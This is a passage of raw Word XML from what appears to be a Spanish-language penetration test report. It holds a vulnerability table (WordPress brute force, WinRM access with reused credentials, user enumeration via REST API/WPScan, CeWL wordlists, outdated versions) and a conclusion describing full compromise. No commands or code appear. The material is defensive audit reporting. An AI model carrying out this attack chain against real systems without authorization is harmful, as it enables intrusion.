            <w:r w:rsidRPr="00301B4F">
              <w:t>Fuerza bruta exitosa en WordPress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1A9F13" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🟠</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Alta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557CB6" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Obtención de credenciales válidas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="7615B629" w14:textId="77777777" w:rsidTr="00301B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31BCE2" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>5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281B2C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> accesible con credenciales reutilizadas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A71E21" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🟠</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Alta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3BCC34" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Acceso remoto como administrador</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="461C2C98" w14:textId="77777777" w:rsidTr="00301B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FA49D7" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>6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EF9C30" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Enumeración de usuarios (API REST/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t>WPScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00301B4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47CA88" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🟡</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Media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31AF3B" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Permite identificar usuarios válidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="5703FB5F" w14:textId="77777777" w:rsidTr="00301B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E7ABF8" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>7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BD2062" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Versiones obsoletas (WordPress/PHP)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9040E5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🟡</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Media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165D3E" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve">Vulnerables a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t>exploits</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> conocidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="2337DF9C" w14:textId="77777777" w:rsidTr="00301B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CF6246" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:lastRenderedPageBreak/>
              <w:t>8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F9ED74" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Generación de diccionario (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t>CeWL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00301B4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171C57" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🟡</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Media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A6D4A1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Facilita ataques dirigidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="472B3769" w14:textId="77777777" w:rsidTr="00301B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8A3A37" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>9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E821F4" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Exposición de archivos informativos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6B5C8A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔵</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Baja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C9FE3D" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Filtrado de información del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00301B4F" w:rsidRPr="00301B4F" w14:paraId="3B3E00B9" w14:textId="77777777" w:rsidTr="00301B4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F99B66" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>10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CB733F" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Información de tecnologías (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00301B4F">
              <w:t>WhatWeb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00301B4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10ED88" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚪</w:t>
            </w:r>
            <w:r w:rsidRPr="00301B4F">
              <w:t xml:space="preserve"> Informativa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757CB5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
            <w:r w:rsidRPr="00301B4F">
              <w:t>Identificación de versiones y servicios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54AE924C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[ESPACIO PARA CAPTURA: Tabla resumen vulnerabilidades]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F4653" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="26DB879E">
          <v:rect id="_x0000_i1035" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9BA63" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026058D0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>La auditoría ha demostrado que, a partir de un acceso inicial al servicio web, es posible comprometer completamente la infraestructura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453BC5CE" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>La combinación de credenciales débiles, reutilización de contraseñas y exposición de servicios internos ha permitido escalar el ataque hasta obtener privilegios máximos en ambos sistemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21204A0E" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Esto implica un riesgo crítico para la organización, ya que un atacante podría tomar control total de los equipos, acceder a información sensible y comprometer la integridad del entorno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAD8973" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRDefault="00301B4F"/>
    <w:sectPr w:rsidR="00301B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27959"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4952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452A20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B58A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7145D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FFC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8A2104"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA46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5A2A1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A440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AB0481"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C9A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224D3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F20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316F52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD9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8E05CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8F4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C55EE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A800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8A06EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B9E2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1B21E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C77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385F19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="227E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0B7FBC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58C6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7245C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A0A0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BE97EE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D9E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4C387D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A62E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26776F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A9E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F22BF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9DF6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360CD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2EAC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5069C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3760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AE37F69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77E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7511EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9222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DC0FD8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2970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24A6C3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6786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7A30DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCD4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8165C00"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A16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FD3F0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3B8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736CE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8362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C6D2AF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="251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9485536">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1895310008">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1864897022">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1531452106">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="179008247">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1771194940">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1592470464">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1364329937">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2015112708">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1911309055">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1199003487">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1462191790">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="93745118">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1491018017">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1962835193">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1092510679">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1940332425">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1506507219">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="458718385">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="866598659">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="474103186">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1381515470">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1138570298">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1454716993">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1367482655">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="931012124">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="818376796">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1846092656">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1258253422">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="16353263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4F"/>
    <w:rsid w:val="001940A3"/>
    <w:rsid w:val="00301B4F"/>
    <w:rsid w:val="00391BA3"/>
    <w:rsid w:val="00586904"/>
    <w:rsid w:val="00903205"/>
    <w:rsid w:val="00964FBA"/>
    <w:rsid w:val="009C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F3E3E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DCED0769-E3FE-4C62-B26C-CD45A8FB5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1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B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B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B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B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B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B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B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B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B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B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2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0903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17644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46927781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57704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20</Pages>
  <Words>2739</Words>
  <Characters>15070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Ade</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Brayan Ade</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-02T11:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-02T12:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>